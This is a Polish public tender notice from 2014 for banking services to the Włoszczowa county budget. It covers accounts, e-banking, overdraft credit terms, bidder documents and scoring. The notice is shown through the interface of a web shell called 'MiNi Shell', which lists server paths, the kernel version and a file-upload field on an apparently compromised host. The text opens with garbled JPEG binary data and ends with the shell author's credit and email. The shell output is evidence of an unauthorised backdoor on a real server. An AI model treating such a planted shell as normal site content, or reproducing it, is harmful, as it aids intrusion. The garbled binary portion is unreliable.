JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140515/164882-N-2014.html

<p class="kh_header"><b>Włoszczowa: Bankowa obsługa budżetu Powiatu Włoszczowskiego i jednostek organizacyjnych Powiatu</b><br>
<b>Numer ogłoszenia: 164882 - 2014; data zamieszczenia: 15.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Wiśniowa 10, 29-100 Włoszczowa, woj. świętokrzyskie, tel. 041 3944950, faks 041 3944965.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-wloszczowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bankowa obsługa budżetu Powiatu Włoszczowskiego i jednostek organizacyjnych Powiatu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest bankowa obsługa budżetu Powiatu Włoszczowskiego i 
       jednostek organizacyjnych Powiatu, których wykaz zawiera załącznik nr 2 do 
       specyfikacji, w okresie od 1 lipca 2014 r. do 31 lipca 2018 roku, przy czym liczba 
       jednostek organizacyjnych Powiatu jak również ich forma organizacyjna w okresie 
      obowiązywania umowy może ulec zmianie. W przypadku zwiększenia liczby jednostek 
      organizacyjnych bądź zmiany ich formy organizacyjnej, nowe jednostki zawrą umowy na 
      warunkach wynikających z przeprowadzonego postępowania. Na dzień dzisiejszy 
      wszystkie jednostki organizacyjne Powiatu są jednostkami budżetowymi.
2. Zakres zamówienia dla Powiatu jako jednostki samorządu terytorialnego, urzędu 
       Starostwa Powiatowego jako jednostki budżetowej oraz jednostek organizacyjnych 
       Powiatu obejmuje:
2.1 Otwarcie, likwidację i prowadzenie rachunków podstawowych i pomocniczych dla 
       Powiatu jako jednostki samorządu terytorialnego, urzędu Starostwa Powiatowego jako  
       jednostki budżetowej oraz jednostek organizacyjnych Powiatu, w tym:
2.1.1 możliwość otwierania dodatkowych rachunków podstawowych i pomocniczych w 
           trakcie   związania zamówieniem, na warunkach zadeklarowanych w ofercie, 
2.1.2 możliwość otwierania i potwierdzania dodatkowych rachunków walutowych, 
2.1.3 likwidację rachunków bankowych na pisemny wniosek wraz z potwierdzeniem,
2.1.4 telefoniczne udzielanie informacji o wysokości salda na rachunku,
2.1.5 oprocentowanie środków na rachunku liczone będzie jako średnia miesięczna 
            stawka  WIBID 1M za poprzedni miesiąc skorygowana o współczynnik określony w 
            złożonej ofercie (WIBID 1M x współczynnik), stały w okresie obowiązywania 
            umowy. Kapitalizacja odsetek następować będzie raz na koniec każdego miesiąca tj. w 
            ostatnim  dniu kalendarzowym. W przypadku likwidacji stawki WIBID 1M, stawka ta 
            zastanie zmieniona na stawkę która ja zastąpi, albo na stawkę najbardziej zbliżoną 
            swoją  wielkością i charakterem.
2.2 Wpłaty i wypłaty gotówkowe, w tym:
     2.2.1.dokonywanie wpłat i wypłat gotówkowych przez osoby upoważnione, działające 
                  w    imieniu posiadaczy rachunków,
    2.2.2.możliwość wypłaty gotówki według nominałów określonych każdorazowo przez 
            posiadaczy rachunków,
    2.2.3. możliwość wymiany gotówki na nominały o mniejszej wartości, tj. na banknoty jak 
                 i bilony,
2.3. Realizację przelewów przekazywanych w formie elektronicznej jak i papierowej, na 
           następujących zasadach:
    2.3..1. przelewy dokonywane przy pomocy systemu bankowości elektronicznej muszą 
                  być    realizowane w czasie rzeczywistym,
    2.3.2. przelewy złożone w formie papierowej do godz. 1400 powinny być realizowane w 
                 tym samym dniu,
2.4. Wdrożenie systemu bankowości elektronicznej do obsługi rachunków bankowych dla 
       dowolnej ilości stanowisk w dowolnej ilości jednostek (Powiat, Starostwo Powiatowe, 
       jednostki organizacyjne), w tym:
     2.4.1. zainstalowanie systemów bankowości elektronicznej,
     2.4.2. serwis oprogramowania, przekazywanie i instalowanie wersji aktualizacyjnych, 
              usuwanie awarii w możliwie najkrótszym czasie, przy czym reakcja serwisu od 
             chwili zgłoszenia powinna nastąpić w ciągu 3 godzin.
     2.4.3. przeszkolenie pracowników, w zależności od zgłoszonych potrzeb,
2.5. System bankowości elektronicznej winien zapewniać co najmniej:
      2.5.1. dostęp do usług przez 24 godziny w każdym dniu roboczym,
      2.5.2. dokonywanie operacji w czasie rzeczywistym,
      2.5.3. możliwość dokonywania przelewów bankowych, 
      2.5.4. generowanie (wydruk) wyciągów bankowych,
      2.5.5. pełną informację o dacie i godzinie operacji, tj. godzina operacji wychodzących z 
               rachunku Zamawiającego i godzina operacji przychodzących na rachunek 
               Zamawiającego, 
      2.5.6. możliwość dokonywania operacji równocześnie tj. w tym samym czasie z różnych 
                rachunków bankowych,
      2.5.7. przechowywanie przelewów i wyciągów w archiwum systemu,
      2.5.8. nadawanie nowych bądź zmiana istniejących uprawnień użytkowników systemu 
                 w dowolnym momencie obowiązywania umowy, na podstawie pisemnej 
                 dyspozycji,
      2.5.9. umożliwienie użytkownikowi dysponowania podpisem elektronicznym 
                  używanym do akceptacji dyspozycji w systemie bankowości elektronicznej.
2.6. Wydawanie blankietów czekowych.
2.7. Sporządzanie wyciągów bankowych w wersji papierowej dla każdego rachunku 
       bankowego. Wyciągi muszą być sporządzone za dni w których na rachunku bankowym 
       wystąpiły obroty. 
2.8. Wydawanie opinii i zaświadczeń na wniosek posiadacza rachunku.
2.9. Zerowanie rachunków bankowych podstawowych i pomocniczych jednostek 
          budżetowych Powiatu, zgodnie z dyspozycjami, polegające na przekazaniu z dniem 31 
          grudnia kwot pozostałych na wskazanych rachunkach na rachunek budżetu Powiatu.
2.10. Przeksięgowanie skapitalizowanych odsetek od rachunków bankowych Powiatu i 
         Starostwa Powiatowego na rachunek budżetu Powiatu, zgodnie ze złożonymi 
         dyspozycjami w tym zakresie.
2.11. Możliwość deponowania wolnych środków pieniężnych znajdujących się na 
         rachunkach  bieżących na lokatach terminowych typu OVERNIGT, pod warunkiem 
         uruchomienia takiej opcji przez Zamawiającego, automatycznie tj. bez dodatkowych 
         formalności, na koniec dnia. Powrót środków pieniężnych z lokaty wraz z należnymi 
         odsetkami nastąpi następnego dnia roboczego nie później niż do godz. 800 i będzie to 
         pierwsza operacja na rachunku bankowym. Zamawiający zastrzega możliwość 
         rezygnacji z tej usługi w dowolnym czasie obowiązywania umowy. Uruchomienie jak 
         również rezygnacja z tej opcji odbędzie się na pisemny wniosek Zamawiającego bez 
         żadnych prowizji i opłat.
          Oprocentowanie środków na rachunku liczone będzie jako dzienna stawka    
          WIBID 1M skorygowana o współczynnik określony w złożonej  ofercie (WIBID 1M x 
          współczynnik), stały w okresie obowiązywania umowy. 
          W przypadku likwidacji stawki WIBID 1M, stawka ta zostanie zmieniona na stawkę 
          która ja zastąpi, albo na stawkę najbardziej zbliżoną swoją wielkością i charakterem,
         w takim przypadku wymagany jest aneks do umowy zaakceptowany przez obydwie 
        strony.
2.12. Możliwość udzielenia na rachunku bieżącym budżetu Powiatu, w każdym roku 
         budżetowym, kredytu krótkoterminowego w rachunku bieżącym na pokrycie 
         występującego w ciągu roku przejściowego deficytu budżetowego, do wysokości 
         określonej w każdym roku przez Radę Powiatu Włoszczowskiego w uchwale 
          budżetowej.   Szczegółowe warunki kredytu określi odrębna umowa, przy czym:
       2.12.1. zabezpieczeniem kredytu będzie weksel własny In blanco wraz z deklaracją 
                  wekslową. Dopuszcza się również jako zabezpieczenie - oświadczenie o poddaniu 
                  się egzekucji,
       2.12.2. każdy wpływ na rachunek bieżący będzie powodował zmniejszenie salda 
                  kredytu,
       2.12.3. uruchomienie kredytu będzie następować bez żadnych prowizji i opłat,
       2.12.4. wykonawca nie będzie pobierał prowizji i opłaty od salda niewykorzystanej 
                    części kredytu,
       2.12.5. kredyt powinien zostać postawiony do dyspozycji w ciągu dwóch dni od daty 
                   podpisania odrębnej umowy kredytowej,
       2.12.6. zamawiający płaci odsetki od rzeczywistego zadłużenia,
       2.12.7. kredyt oprocentowany będzie według dziennej stawki bazowej WIBOR dla 
                  depozytów 1M, ustaloną jako średnia arytmetyczna notowań stawki WIBOR 1M 
                  za miesiąc poprzedzający kolejny miesięczny okres odsetkowy, powiększonej lub 
                  pomniejszonej o marżę Wykonawcy w wysokości określonej w złożonej ofercie, 
                  stałą w okresie obowiązywania zamówienia.
       2.12.8. odsetki od wykorzystywanego kredytu naliczane będą w miesięcznych okresach 
                   obrachunkowych, przy czym pierwszy okres rozpoczyna się od dnia postawienia 
                   kredytu do dyspozycji Zamawiającego, kolejne okresy liczone są od następnego 
                  dnia po zakończeniu poprzedniego okresu, ostatni okres obrachunkowy kończy się 
                   w dniu poprzedzającym dzień całkowitej spłaty kredytu.
           2.12.9. zmiana stawek bazowych nie wymaga odrębnego powiadomienia 
                       Zamawiającego.
          2.12.10. w przypadku likwidacji stawki WIBOR 1M, zostanie ona zmieniona na 
                       stawkę, która zastąpi stawkę WIBOR 1M, albo najbardziej zbliżoną swoją 
                      wielkością i charakterem do stawki WIBOR 1M.
3.  Z uwagi na przedmiot zamówienia zawarta zostanie umowa ogólna z Powiatem 
     Włoszczowskim na wykonanie obsługi bankowej budżetu Powiatu w zakresie 
     dotyczącym świadczenia usług bankowych dla Powiatu jako jednostki samorządu 
     terytorialnego i urzędu Starostwa Powiatowego jako jednostki budżetowej. Umowa 
     ta będzie zawierać wszystkie elementy składające się na przedmiot zamówienia. 
     Umowa ta może odsyłać do umów szczególnych np. umowy dotyczącej usług 
     bankowości elektronicznej, umowy dotyczącej kredytu krótkoterminowego w 
     rachunku bieżących. W przypadku wystąpienia umów szczególnych ich ilość 
    będzie uzgadniana z wyłonionym Wykonawcą. 
4.  Zastrzega się, iż w całym okresie obowiązywania umowy ilość rachunków
   bankowych jak również ilość jednostek organizacyjnych może ulec zmianie. 
5.  Zastrzega się aby wszystkie jednostki organizacyjne Powiatu miały takie samo 
   prawo do zawarcia umów na wykonanie bankowej obsługi, na warunkach będących 
   przedmiotem zamówienia publicznego. W przypadku łączenia, przekształcenia 
   jednostek organizacyjnych, utworzenia nowych jednostek organizacyjnych Powiatu, 
   Wykonawca podpisze z nimi umowę na prowadzenie obsługi bankowej na takich 
   samych zasadach i warunkach, jakie wynikają z przeprowadzonego postępowania o udzielenie zamówienia publicznego.
6.  Z poszczególnymi jednostkami organizacyjnymi Powiatu zostaną zawarte odrębne 
  umowy bankowej obsługi, na warunkach będących przedmiotem zamówienia 
  publicznego, według jednolitego wzoru umowy ustalonego z wybranym 
  Wykonawcą, z uwzględnieniem zmian wynikających ze specyfiki jednostki np. brak 
  kredytu odnawialnego krótkoterminowego w rachunku bieżącym, itp..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełniania warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełniania warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełniania warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełniania warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełniania warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  oświadczenie o zapoznaniu się z postanowieniami specyfikacji - według załącznika nr 3 do formularza ofertowego,
2.  oświadczenie o spełnianiu warunków określonych w art.5 ust. 1 ustawy z dnia 29 
        sierpnia 1997 r. Prawo bankowe (tj. Dz.U. z 2012 poz.1376 z późn. zmian.) - według załącznika nr 4 do formularza ofertowego.
3. zezwolenie Komisji Nadzoru Finansowego na utworzenie banku lub oddziału banku  
      zagranicznego w kraju; w przypadku banku państwowego należy dołączyć informację 
      zawierającą rocznik i numer Dziennika Ustaw oraz pozycję właściwego   rozporządzenia 
      Rady Ministrów,
4 uchwałę rady nadzorczej zawierającej w swej treści  skład osobowy zarządu banku wraz 
      ze zgodą Komisji Nadzoru Finansowego, o której mowa w odpowiednich przepisach 
      Prawa bankowego lub aktualny pełny odpis z KRS, przy czym pełny odpis z KRS ma 
      być wystawiony przez właściwy organ rejestrowy nie wcześniej niż 6 miesięcy przed 
      upływem terminu składania ofert.   
5. kopię bilansu oraz rachunku zysków i strat, a w przypadku Wykonawców 
       niezobowiązanych do sporządzenia bilansu i rachunku zysków i strat innych 
       dokumentów określających obroty oraz zobowiązania i należności za rok 2012 i 2013.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.</li>
<li>2 - kryterium I - miesięczna opłata za prowadzenie rachunku - 35</li>
<li>3 - kryterium II - oprocentowanie środków na rachunkach w skali roku - 55</li>
<li>4 - kryterium III - oprocentowanie lokat typu OVERNIGHT - 5</li>
<li>5 - kryterium IV - oprocentowanie kredytu krótkoterminowego - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starostwo.wloszczowa.eobip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe we Włoszczowie , ul. Wiśniowa 10, 29-100 Włoszczowa, pokój 304..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2014 godzina 12:00, miejsce: Starostwo Powiatowe we Włoszczowie , ul. Wiśniowa 10, 29-100 Włoszczowa, pokój 325..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com